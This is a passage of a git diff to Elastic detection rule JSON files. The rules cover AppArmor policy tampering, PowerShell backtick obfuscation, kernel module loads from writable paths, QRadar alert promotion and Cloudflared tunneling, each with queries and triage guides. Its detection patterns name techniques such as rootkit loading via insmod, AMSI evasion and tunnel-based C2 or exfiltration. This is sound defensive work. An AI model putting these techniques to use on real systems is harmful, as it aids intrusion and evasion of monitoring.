replace, or remove an AppArmor profile while troubleshooting or deploying a local service, so confirm the initiating user, any `sudo` or privileged session history, and recent edits to AppArmor profile files align with an authorized operational task.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network while preserving forensic access, terminate the process or shell session that wrote to `/sys/kernel/security/apparmor/.load`, `.replace`, or `.remove`, and disable the originating account\u2019s privileged access until the scope is understood.\n- Collect and review the active AppArmor state and on-disk profiles from `/etc/apparmor.d/`, recent shell history, sudo activity, and any scripts or package hooks involved, then remove attacker-added profiles and reverse any profile changes that weakened or removed confinement.\n- Hunt for and delete persistence that relied on the AppArmor change, including malicious systemd units, cron entries, startup scripts, modified container launch settings, or dropped binaries that were able to run only after the profile was replaced or removed.\n- Restore the system to a known-good state by reinstalling trusted AppArmor policy packages or redeploying validated profiles from source control, reloading them with approved tools, and rebuilding the host from a clean image if root access or core security files were modified.\n- Escalate to incident response immediately if the tampered profile protected an internet-facing service, credential store, or security tool, if the same behavior is seen on multiple hosts, or if the attacker also changed sudoers, SSH access, or other local security controls.\n- Harden the environment by restricting who can administer AppArmor, requiring signed or change-controlled profile updates, alerting on future writes to the AppArmor policy interfaces, and validating that critical services remain in enforce mode after patching or deployment.", + "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"wrote-to-file\", \"deleted\") and\nfile.path in (\n \"/sys/kernel/security/apparmor/.load\", \".load\",\n \"/sys/kernel/security/apparmor/.replace\", \".replace\",\n \"/sys/kernel/security/apparmor/.remove\", \".remove\"\n)\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d32f0c27-8edb-4bcf-975e-01696c961e08", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /sys/kernel/security/apparmor/.load -p rw -k apparmor_policy_change\n-w /sys/kernel/security/apparmor/.replace -p rw -k apparmor_policy_change\n-w /sys/kernel/security/apparmor/.remove -p rw -k apparmor_policy_change\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d32f0c27-8edb-4bcf-975e-01696c961e08_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_6.json b/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_6.json deleted file mode 100644 index 873c01eb82c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d43f2b43-02a1-4219-8ce9-10929a32a618_6.json +++ /dev/null @@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use backtick-escaped characters inside ${} variable expansion as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques like backtick-escaped variable expansion to evade detection. This method involves disguising malicious scripts to bypass security measures. The detection rule identifies scripts with excessive length and specific obfuscation patterns, flagging potential threats for further analysis.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the content of the script and identify any suspicious or malicious commands.\n- Examine the `file.path` and `file.name` fields to determine the origin and context of the script execution, which may provide insights into whether the script is part of a legitimate process or potentially malicious activity.\n- Check the `host.name` and `agent.id` fields to identify the affected system and correlate with other security events or logs from the same host for additional context.\n- Analyze the `user.id` field to determine which user account executed the script, and assess whether this activity aligns with the user's typical behavior or role.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution flow of the script and identify any related script blocks that may have been executed in sequence.\n- Consider the `count` field to evaluate the extent of obfuscation used in the script, which may indicate the level of sophistication or intent behind the script.\n\n### False positive analysis\n\n- Scripts with legitimate administrative functions may use backtick-escaped variable expansion for complex string manipulations. Review the script's context and purpose to determine if it aligns with expected administrative tasks.\n- Automated scripts generated by trusted software might include obfuscation patterns as part of their normal operation. Verify the source and integrity of the software to ensure it is from a reputable vendor.\n- Developers and IT professionals may use obfuscation techniques during testing or development phases. Establish a process to whitelist known development environments or user accounts to reduce unnecessary alerts.\n- PowerShell scripts that are part of legitimate security tools or monitoring solutions may trigger the rule. Identify and exclude these tools by their file path or script block ID to prevent false positives.\n- Regularly update the list of known false positives based on historical data and feedback from users to refine the detection rule and improve its accuracy.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of the potentially malicious script across the network.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of obfuscated scripts.\n- Conduct a thorough review of the script block text and associated file paths to identify and remove any malicious scripts or files from the system.\n- Reset credentials for any user accounts involved in the alert to mitigate the risk of compromised credentials being used for further attacks.\n- Escalate the incident to the security operations team for a deeper investigation into potential lateral movement or additional compromised systems.\n- Implement enhanced monitoring on the affected host and similar systems to detect any recurrence of obfuscation techniques or related suspicious activities.\n- Update endpoint protection and intrusion detection systems with indicators of compromise (IOCs) derived from the analysis to improve detection capabilities for similar threats in the future.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"\\$\\{(\\w++`){2,}\\w++\\}\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.name,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "d43f2b43-02a1-4219-8ce9-10929a32a618", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "d43f2b43-02a1-4219-8ce9-10929a32a618_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2.json b/packages/security_detection_engine/kibana/security_rule/d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2.json new file mode 100644 index 00000000000..629a7d68f30 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Load from Unusual Location", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Kernel Module Load from Unusual Location\n\nThis rule detects attempts to load Linux kernel modules from atypical directories, which can indicate an attacker trying to run code in kernel space for stealth and long-term persistence. Adversaries often drop a malicious `.ko` into writable paths like `/tmp` or `/dev/shm` after initial access, then use `insmod` or `modprobe` to insert it and hide processes, files, or network activity as a rootkit.\n\n### Possible investigation steps\n\n- Capture the full command line and resolve any referenced `.ko` path, then collect the module file for hashing and static analysis to determine provenance and known-malware matches. \n- Confirm whether the module is currently loaded by querying `lsmod`/`/proc/modules`, then map it to its on-disk location with `modinfo -n ` (or `/sys/module//sections/*`) to validate it was loaded from the suspicious directory. \n- Review recent kernel and audit telemetry (`dmesg`, `/var/log/kern.log`, `journalctl -k`, and any audit records) around the event time for insertion messages, signature/taint indicators, and any follow-on errors suggesting tampering. \n- Identify the initiating user/session and execution chain (parent process tree, TTY/SSH source, container context), then determine whether the action aligns with legitimate admin activity or coincides with other compromise signals on the host. \n- Hunt for persistence and repeatability by checking for recurring module-load attempts and inspecting boot-time and scheduled execution paths (systemd units, init scripts, cron, rc.local) that could reload the module after reboot.\n\n### False positive analysis\n\n- A system administrator or automated maintenance workflow may build or test an out-of-tree kernel module and load it with `insmod`/`modprobe` from a staging directory such as `/tmp`, `/root`, or `/mnt` before installing it into standard module paths. \n- A legitimate bootstrapping or recovery operation may load a required driver module from nonstandard media or temporary runtime locations (e.g., `/boot`, `/run`, `/var/run`, or `/mnt`) during troubleshooting, initramfs/early-boot tasks, or mounting encrypted/storage devices.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network and disable external access (e.g., revoke SSH keys or block inbound SSH) to prevent additional module loads or lateral movement while preserving evidence. \n- If the suspicious module is currently loaded, record `lsmod` and `modinfo` output, then unload it where safe (`modprobe -r `/`rmmod `) and quarantine the corresponding `.ko` from the unusual path (e.g., `/tmp`, `/dev/shm`, `/home`, `/mnt`) for hashing and malware analysis. \n- Remove persistence mechanisms that would reload the module by deleting or disabling any related systemd units, init scripts, cron entries, and boot-time hooks, and validate `/etc/modules-load.d/`, `/lib/modules/$(uname -r)/`, and `depmod` outputs for unauthorized additions. \n- Recover the host by restoring known-good kernel/module packages and rebuilding the initramfs, then reboot and verify no unexpected modules remain in `/proc/modules` and no new load attempts occur from writable directories. \n- Escalate immediately to IR/forensics and consider full host rebuild if the module is unsigned/unknown, the kernel is tainted, module removal fails, or post-reboot evidence indicates stealth behavior consistent with a rootkit. \n- Harden by restricting module loading (enable Secure Boot/module signature enforcement where supported, set `kernel.modules_disabled=1` after boot on fixed-function systems, and limit `CAP_SYS_MODULE` to trusted admins), and enforce file integrity monitoring/permissions to prevent `.ko` creation in world-writable locations.", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name == \"kmod\" and process.args == \"insmod\" and process.args like~ \"*.ko*\") or\n (process.name == \"kmod\" and process.args == \"modprobe\" and not process.args in (\"-r\", \"--remove\")) or\n (process.name == \"insmod\" and process.args like~ \"*.ko*\") or\n (process.name == \"modprobe\" and not process.args in (\"-r\", \"--remove\"))\n) and (\n process.working_directory like (\n \"/tmp*\", \"/var/tmp*\", \"/dev/shm*\", \"/run*\", \"/var/run*\", \"/home*/*\", \"/root*\",\n \"/var/www*\", \"/boot*\", \"/srv*\", \"/mnt*\", \"/media*\"\n ) or\n process.parent.working_directory like (\n \"/tmp*\", \"/var/tmp*\", \"/dev/shm*\", \"/run*\", \"/var/run*\", \"/home*/*\", \"/root*\",\n \"/var/www*\", \"/boot*\", \"/srv*\", \"/mnt*\", \"/media*\"\n ) or\n process.args like (\n \"/tmp/*\", \"/var/tmp/*\", \"/dev/shm/*\", \"/run/*\", \"/var/run/*\", \"/home/*/*\", \"/root/*\",\n \"/var/www/*\", \"/boot/*\", \"/srv/*\", \"/mnt/*\", \"/media/*\", \"./*\"\n )\n) and\nnot (\n process.parent.executable == \"/usr/bin/podman\" or\n process.working_directory like \"/tmp/newroot\"\n)\n", + "references": [ + "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.working_directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Threat: Rootkit", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "d54b649d-46d0-4b4c-a9a7-1bc9fc458d3c_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d6702168-2be6-4d7d-a549-9bff67733df3_1.json b/packages/security_detection_engine/kibana/security_rule/d6702168-2be6-4d7d-a549-9bff67733df3_1.json new file mode 100644 index 00000000000..fc7dabca67c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d6702168-2be6-4d7d-a549-9bff67733df3_1.json @@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app.", + "from": "now-2m", + "index": [ + "logs-ibm_qradar.offense-*" + ], + "interval": "1m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 1000, + "name": "IBM QRadar External Alerts", + "note": "## Triage and analysis\n\n### Investigating IBM QRadar External Alerts\n\nIBM QRadar is a Security Intelligence Platform that provides SIEM, log management, anomaly detection, and incident forensics. The rule promotes QRadar offense records as Elastic detection alerts, enabling analysts to investigate potential threats with full offense context including rule names, severity, and status.\n\n### Possible investigation steps\n\n- Review the offense details including rule name, description, and categories to understand the nature of the alert.\n- Examine the offense severity and status (OPEN, HIDDEN, etc.) to prioritize investigation.\n- Cross-reference the offense with QRadar console for additional context including contributing events and log sources.\n- Investigate source and destination networks, device count, and event count associated with the offense.\n- Consult the IBM QRadar investigation guide and resources tagged in the alert for specific guidance on handling similar threats.\n\n### False positive analysis\n\n- Offenses triggered by routine administrative activities or known maintenance can be false positives. Review the offense context and create exceptions for scheduled activities.\n- Legitimate security testing or penetration testing may generate offenses. Coordinate with security teams to whitelist these during scheduled tests.\n- Low-severity offenses from specific rules that are known to produce noise can be excluded by creating rule exceptions.\n- Offenses from development or test environments may not require investigation. Consider excluding these environments if appropriate.\n\n### Response and remediation\n\n- Isolate affected systems if malicious activity is confirmed to prevent lateral movement.\n- Review the offense details to identify compromised accounts, credentials, or systems and take appropriate remediation steps.\n- Apply relevant security patches or updates to address any exploited vulnerabilities.\n- Escalate to the security operations center (SOC) or incident response team for further analysis if the threat appears significant.\n- Document the incident and update detection logic or exceptions based on findings.\n", + "query": "event.kind: alert and data_stream.dataset: ibm_qradar.offense\n", + "references": [ + "https://docs.elastic.co/en/integrations/ibm_qradar" + ], + "related_integrations": [ + { + "package": "ibm_qradar", + "version": "^0.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "data_stream.dataset", + "type": "constant_keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + } + ], + "risk_score": 47, + "risk_score_mapping": [ + { + "field": "ibm_qradar.offense.magnitude", + "operator": "equals", + "value": "" + } + ], + "rule_id": "d6702168-2be6-4d7d-a549-9bff67733df3", + "rule_name_override": "rule.name", + "setup": "## Setup\n\n### IBM QRadar Offense Integration\nThis rule is designed to capture offense events generated by the IBM QRadar integration and promote them as Elastic detection alerts.\n\nTo capture IBM QRadar offenses, install and configure the IBM QRadar integration to ingest offense records into the `logs-ibm_qradar.offense-*` index pattern.\n\nIf this rule is enabled alongside the External Alerts promotion rule (UUID: eb079c62-4481-4d6e-9643-3ca499df7aaa), you may receive duplicate alerts for the same QRadar events. Consider adding a rule exception for the External Alert rule to exclude data_stream.dataset:ibm_qradar.offense to avoid receiving duplicate alerts.\n\n### Additional notes\n\nFor information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).\n", + "severity": "medium", + "severity_mapping": [ + { + "field": "event.severity", + "operator": "equals", + "severity": "low", + "value": "21" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "medium", + "value": "47" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "high", + "value": "73" + }, + { + "field": "event.severity", + "operator": "equals", + "severity": "critical", + "value": "99" + } + ], + "tags": [ + "Data Source: IBM QRadar", + "Use Case: Threat Detection", + "Resources: Investigation Guide", + "Promotion: External Alerts" + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "d6702168-2be6-4d7d-a549-9bff67733df3_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1.json b/packages/security_detection_engine/kibana/security_rule/d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1.json new file mode 100644 index 00000000000..7914fac648b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Cloudflared", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Cloudflared\n\nCloudflare Tunnel (cloudflared) is a legitimate tool for exposing local services through Cloudflare's edge. Adversaries abuse it to create quick or named tunnels for C2, data exfiltration, or ingress tool transfer while evading direct connection blocking.\n\n### Possible investigation steps\n\n- Confirm the process command line for `tunnel`, `--url`, or `tunnel run` to validate cloudflared tunnel usage.\n- Identify the parent process and process executable path; cloudflared run from temp or user writable locations is more suspicious than from Program Files.\n- For quick tunnel (`--url http://...`), identify the local URL and whether it could be a C2 callback or proxy.\n- Correlate with network data for outbound connections to Cloudflare IPs or trycloudflare.com-style hostnames around the same time.\n- Review the user and session that started the tunnel; look for other suspicious logon or execution from the same context.\n\n### False positive analysis\n\n- Legitimate use of Cloudflare Tunnel for development or internal services may trigger this rule; consider allowlisting by path or user for approved use cases.\n\n### Response and remediation\n\n- If unauthorized tunnel use is confirmed: isolate the host, terminate the cloudflared process, and block cloudflared or Cloudflare tunnel domains at DNS/firewall where policy permits.\n- Rotate credentials for any accounts that may have been exposed over the tunnel.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"cloudflared.exe\" or ?process.pe.original_file_name == \"cloudflared.exe\" or ?process.code_signature.subject_name : \"Cloudflare, Inc.\") and process.args : \"tunnel\"\n", + "references": [ + "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps/install-and-setup/tunnel-useful-commands/", + "https://attack.mitre.org/techniques/T1572/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "d6e1b3f0-8a2c-4e7d-b5f9-1c0e3a6d8b2f_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dacfbecd-7927-46a7-a8ba-feb65a2e990d_1.json b/packages/security_detection_engine/kibana/security_rule/dacfbecd-7927-46a7-a8ba-feb65a2e990d_1.json new file mode 100644 index 00000000000..5ef752f0e24 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dacfbecd-7927-46a7-a8ba-feb65a2e990d_1.json @@ -0,0 +1,160 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or 